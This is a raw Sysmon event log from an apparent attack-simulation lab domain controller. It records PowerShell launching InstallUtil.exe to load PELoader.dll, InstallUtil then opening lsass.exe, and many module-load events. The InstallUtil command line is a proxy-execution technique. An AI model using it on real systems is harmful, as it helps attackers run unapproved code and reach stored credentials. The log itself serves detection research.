19:23:55.792{8B6011A9-886B-6164-0B00-00000000F101}6488568C:\Windows\system32\lsass.exe{8B6011A9-BF4B-618E-0600-05000000F101}9056C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057678849Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:23:55.792{8B6011A9-886B-6164-0B00-00000000F101}6488568C:\Windows\system32\lsass.exe{8B6011A9-BF4B-618E-0600-05000000F101}9056C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000057678848Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:23:55.792{8B6011A9-BF4B-618E-0600-05000000F101}9056C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\sspicli.dll10.0.14393.2580 (rs1_release_inmarket.181009-1745)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsspicli.dllMD5=5061339CE61C0B32DB8F51A95E3B2422,SHA256=60558CA374334D4C6BBAD475921538C14A9FF3422893348A0503C1F33015FD25trueMicrosoft WindowsValid 12241200x800000000000000057678847Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 19:23:55.792{8B6011A9-BF4B-618E-0600-05000000F101}9056C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap 734700x800000000000000057678846Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:23:55.792{8B6011A9-BF4B-618E-0600-05000000F101}9056C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\srvcli.dll10.0.14393.0 (rs1_release.160715-1616)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=656F846CAED76C6FC5C76E8BACEF4EF6,SHA256=DFDE27C086764ACC1EA3E6A4E2BA50C2AB532F9E1D99203861F51910A8D850FBtrueMicrosoft WindowsValid 734700x800000000000000057678845Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:23:55.792{8B6011A9-BF4B-618E-0600-05000000F101}9056C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923trueMicrosoft WindowsValid 734700x800000000000000057678844Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:23:55.792{8B6011A9-BF4B-618E-0600-05000000F101}9056C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\SHCore.dll10.0.14393.4169 (rs1_release.210107-1130)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=D287E1BC5A148E2BCB482DBD0E925738,SHA256=1C2428AD170165DD8DE960C835D9AAB5B268300A676FE935B177ED5D2607430DtrueMicrosoft WindowsValid 734700x800000000000000057678843Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:23:55.792{8B6011A9-BF4B-618E-0600-05000000F101}9056C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\iertutil.dll11.00.14393.4467 (rs1_release.210604-1844)Run time utility for Internet ExplorerInternet ExplorerMicrosoft CorporationIeRtUtil.dllMD5=1D608361848C3A3AC56488995E8D0BB1,SHA256=D95DE5DBAD08E22CB0CFB9322220E752F16124C15867F7748E4D64795E400EBFtrueMicrosoft WindowsValid 734700x800000000000000057678842Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:23:55.792{8B6011A9-BF4B-618E-0600-05000000F101}9056C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\urlmon.dll11.00.14393.4530 (rs1_release.210705-0736)OLE32 Extensions for Win32Internet ExplorerMicrosoft CorporationUrlMon.dllMD5=B63DBDFEC215CF37259DC4A88ADBD0E7,SHA256=67B02F3DE0AF36E76C2D259CE7833EDA4FE33D935538E8A4C1E7E82130870FC1trueMicrosoft WindowsValid 734700x800000000000000057678841Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:23:55.745{8B6011A9-BF4B-618E-0600-05000000F101}9056C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Confe64a9051#\bcacaaa795f281ac827a1af051d3a051\System.Configuration.Install.ni.dll4.8.3761.0 built by: NET48REL1.NET FrameworkMicrosoft® .NET FrameworkMicrosoft CorporationSystem.Configuration.Install.dllMD5=DF0A266E1C073131336B9597E2543820,SHA256=F1079A19E1C6E19EB1A2BA701A3919A0A0474EDFA579D8F3EC05965ECDF5F6FDfalse-Unavailable 734700x800000000000000057678840Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:23:55.745{8B6011A9-BF4B-618E-0600-05000000F101}9056C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\clrjit.dll4.8.4410.0 built by: NET48REL1LAST_BMicrosoft .NET Runtime Just-In-Time CompilerMicrosoft® .NET FrameworkMicrosoft Corporationclrjit.dllMD5=0745D9F1BAC58E47CC87656768304313,SHA256=BBA1936354A9EF269B283FE706A74B73BE39CAF4DD57AB0D1CD06A1C75E260A2trueMicrosoft CorporationValid 734700x800000000000000057678839Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:23:55.745{8B6011A9-BF4B-618E-0600-05000000F101}9056C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\ole32.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=676B0A1FB2A01D19AECB1F19883B6FC4,SHA256=56DEB219840DBAF9DAF645AD5D79AF9AB05F20E688382854DD487F440B257552trueMicrosoft WindowsValid 734700x800000000000000057678828Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:23:55.730{8B6011A9-BF4B-618E-0600-05000000F101}9056C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll4.8.4180.0 built by: NET48REL1LAST_BMicrosoft .NET Runtime Execution EngineMicrosoft® .NET FrameworkMicrosoft Corporationmscoreei.dllMD5=899A8B655E52A061B33571D97C5C06ED,SHA256=DE05B03E37FB9BA5D74CF8FA36A6F0B15AB61705285B738BC90D14FDE580A45EtrueMicrosoft CorporationValid 13241300x800000000000000057678813Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 19:23:55.730{8B6011A9-884A-6164-0100-00000000F101}4SystemHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\CIT\Module\Microsoft.NET/Framework64/v4.0.30319/clr.dll\\Device\HarddiskVolume1\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeQWORD (0x01d7d7fa-0xd5ab86bc) 734700x800000000000000057678811Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:23:55.730{8B6011A9-BF4B-618E-0600-05000000F101}9056C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\version.dll10.0.14393.0 (rs1_release.160715-1616)Version Checking and File Installation LibrariesMicrosoft® Windows® Operating SystemMicrosoft CorporationVERSION.DLLMD5=CFDB018AC09F879CAAE7A66CA7880D57,SHA256=6AB95FD0D142CFFC3B9455AF51F003E1CD75B7F4323820390B975F9E1C8A47A5trueMicrosoft WindowsValid 734700x800000000000000057678809Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:23:55.730{8B6011A9-BF4B-618E-0600-05000000F101}9056C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659CtrueMicrosoft WindowsValid 734700x800000000000000057678792Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:23:55.714{8B6011A9-BF4B-618E-0600-05000000F101}9056C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\mscoree.dll10.0.14393.0 (rs1_release.160715-1616)Microsoft .NET Runtime Execution EngineMicrosoft® Windows® Operating SystemMicrosoft Corporationmscoree.dllMD5=5ECE402D7E12EC3750D044BF3D878DF6,SHA256=3F02B1AE7B61BC36B04EA2B82ED79F112219F4E9668518030FF14B005E2C9BBCtrueMicrosoft WindowsValid 734700x800000000000000057678784Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:23:55.730{8B6011A9-BF4B-618E-0600-05000000F101}9056C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=E1024CF2E35DD3467F52BC83F7FEDA3F,SHA256=59C87761AD509BD096C2F35257C2370FB94B95160CB63FB9E66DFD8210AB002AtrueMicrosoft WindowsValid 734700x800000000000000057678783Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:23:55.730{8B6011A9-BF4B-618E-0600-05000000F101}9056C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValid 734700x800000000000000057678782Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:23:55.730{8B6011A9-BF4B-618E-0600-05000000F101}9056C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValid 734700x800000000000000057678780Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:23:55.730{8B6011A9-BF4B-618E-0600-05000000F101}9056C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\gdi32full.dll10.0.14393.4530 (rs1_release.210705-0736)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=9D82D7DBC3D9E0D8E86D10A5B1BF736E,SHA256=270CA1A42ECB4C22E826C1C95924F0014CC99254AB55B7167DA144D45E238E6DtrueMicrosoft WindowsValid 734700x800000000000000057678779Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:23:55.730{8B6011A9-BF4B-618E-0600-05000000F101}9056C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValid 734700x800000000000000057678778Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:23:55.730{8B6011A9-BF4B-618E-0600-05000000F101}9056C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=8AAF6E1B14B9210052FFF90E25926D63,SHA256=F2120C8E63EA94F8618B31319A534731C16D8FDD58B0E1E70217D72A39D78353trueMicrosoft WindowsValid 734700x800000000000000057678777Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:23:55.730{8B6011A9-BF4B-618E-0600-05000000F101}9056C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValid 734700x800000000000000057678776Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:23:55.730{8B6011A9-BF4B-618E-0600-05000000F101}9056C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\combase.dll10.0.14393.4583 (rs1_release.210730-1850)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=878EBD02A580FDF8F187100127E6D3A8,SHA256=54E4BADDFBD97CFFF871B6D7316B28872218B92F37C41199F71EB37BC5634216trueMicrosoft WindowsValid 734700x800000000000000057678775Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:23:55.730{8B6011A9-BF4B-618E-0600-05000000F101}9056C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\shlwapi.dll10.0.14393.4169 (rs1_release.210107-1130)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=F9E249B6BB80C06BA30A61854567796C,SHA256=E5F62CD5D2FE7BE8D4E029ECA004A8773FF8D1F7AB92C115810AD54B5B8F50CAtrueMicrosoft WindowsValid 734700x800000000000000057678774Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:23:55.730{8B6011A9-BF4B-618E-0600-05000000F101}9056C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\rpcrt4.dll10.0.14393.4467 (rs1_release.210604-1844)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=B0C4BF9491FB453B77399E3C56C11DC8,SHA256=66D5D1B3D25D15EA8737C8B2EF83E770BA10931868F24DCACC50936F0A0BAC08trueMicrosoft WindowsValid 734700x800000000000000057678773Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:23:55.714{8B6011A9-BF4B-618E-0600-05000000F101}9056C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\sechost.dll10.0.14393.3808 (rs1_release.200707-2105)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=E6B98644CD3B912C44C39CC0996790A9,SHA256=23BE56E1B8DBA449C0959753175BD15457EC88E93E9E8B86489266347959A6F2trueMicrosoft WindowsValid 734700x800000000000000057678772Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:23:55.714{8B6011A9-BF4B-618E-0600-05000000F101}9056C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValid 734700x800000000000000057678771Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:23:55.714{8B6011A9-BF4B-618E-0600-05000000F101}9056C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\advapi32.dll10.0.14393.4467 (rs1_release.210604-1844)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=A8CDCAC5C32D14ED8AADDF5489FC5D55,SHA256=140F07A8F6780DAFE20CC4FBE86C9332FB2F0C26ED8F49914BD05265C63EF6F1trueMicrosoft WindowsValid 10341000x800000000000000057678770Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:23:55.714{8B6011A9-A829-618E-48FD-04000000F101}28766048C:\Windows\system32\conhost.exe{8B6011A9-BF4B-618E-0600-05000000F101}9056C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000057678768Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:23:55.714{8B6011A9-BF4B-618E-0600-05000000F101}9056C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\KernelBase.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=0F627827D9CFFA8E0BCF30F013FB7209,SHA256=EA47C3E471801ACA92EE449C66CF785EA670ADE92A5A2D5CDB81C93DD72ABEF0trueMicrosoft WindowsValid 734700x800000000000000057678767Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:23:55.714{8B6011A9-BF4B-618E-0600-05000000F101}9056C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 734700x800000000000000057678765Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:23:55.714{8B6011A9-BF4B-618E-0600-05000000F101}9056C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\ntdll.dll10.0.14393.4530 (rs1_release.210705-0736)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=36B87C41EE39F3051D116F735EBEF866,SHA256=9C45BAE6D7E27B3AE04BBF88B96686C04ED6A43695558E82B687013BA0383F8AtrueMicrosoft WindowsValid 734700x800000000000000057678764Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:23:55.714{8B6011A9-BF4B-618E-0600-05000000F101}9056C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe4.8.3761.0 built by: NET48REL1.NET Framework installation utilityMicrosoft® .NET FrameworkMicrosoft CorporationInstallUtil.exeMD5=4F296B709C187304D4609C11FD2BDC03,SHA256=756E583FF1E00A5DB0A2BEE3849693920C4BDFBE87D8757834093372CD690C71trueMicrosoft CorporationValid 10341000x800000000000000057678763Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:23:55.714{8B6011A9-888A-6164-7000-00000000F101}34483736C:\Windows\system32\csrss.exe{8B6011A9-BF4B-618E-0600-05000000F101}9056C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000057678762Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:23:55.714{8B6011A9-A828-618E-47FD-04000000F101}3756712C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{8B6011A9-BF4B-618E-0600-05000000F101}9056C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+384146|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4ce006b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+41634c4(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+41630ff(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4c2b42d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4120071(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4183ae3(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4165af2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4165af2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4165983(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+41566a3(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4163be5(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4163757(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+41634c4(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+41630ff(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4c2b42d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+41483aa(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+414791c(wow64) 154100x800000000000000057678761Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:23:55.722{8B6011A9-BF4B-618E-0600-05000000F101}9056C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe4.8.3761.0 built by: NET48REL1.NET Framework installation utilityMicrosoft® .NET FrameworkMicrosoft CorporationInstallUtil.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe" /logfile= /LogToConsole=false /? PELoader.dllC:\Users\Administrator\Desktop\ATTACKRANGE\Administrator{8B6011A9-8897-6164-CBF3-050000000000}0x5f3cb2HighMD5=4F296B709C187304D4609C11FD2BDC03,SHA256=756E583FF1E00A5DB0A2BEE3849693920C4BDFBE87D8757834093372CD690C71{8B6011A9-A828-618E-47FD-04000000F101}3756C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 734700x800000000000000057678981Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:23:55.808{8B6011A9-BF4B-618E-0600-05000000F101}9056C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\e1c9eb2e855d26a67dbf39e6236430de\System.Xml.ni.dll4.8.3761.0 built by: NET48REL1.NET FrameworkMicrosoft® .NET FrameworkMicrosoft CorporationSystem.Xml.dllMD5=695EB4BE24FC9DB279F2427D31AD35D4,SHA256=014EDA5BD7025A6F01BEA1F6E05663FE4BCE64FA95B7378EBF9C827991B32E64false-Unavailable 734700x800000000000000057678972Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:23:55.792{8B6011A9-BF4B-618E-0600-05000000F101}9056C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\625a7ccd665c33cee4988e3cd136b902\System.Core.ni.dll4.8.4395.0 built by: NET48REL1LAST_B.NET FrameworkMicrosoft® .NET FrameworkMicrosoft CorporationSystem.Core.dllMD5=27741782AAECFE54A201896D93BA1C9A,SHA256=7389517EE682897300DE398245D2C3EE37E5060CF6320138430A8AA86E6E737Bfalse-Unavailable 734700x800000000000000057678969Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:23:55.745{8B6011A9-BF4B-618E-0600-05000000F101}9056C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll4.8.4380.0 built by: NET48REL1LAST_B.NET FrameworkMicrosoft® .NET FrameworkMicrosoft CorporationSystem.dllMD5=C928B5301D291782935A1342A01F6125,SHA256=945ACD65BDCE2291C3C2D15FD910F6E331570D516D386C53FDFB5EC38BE69125false-Unavailable 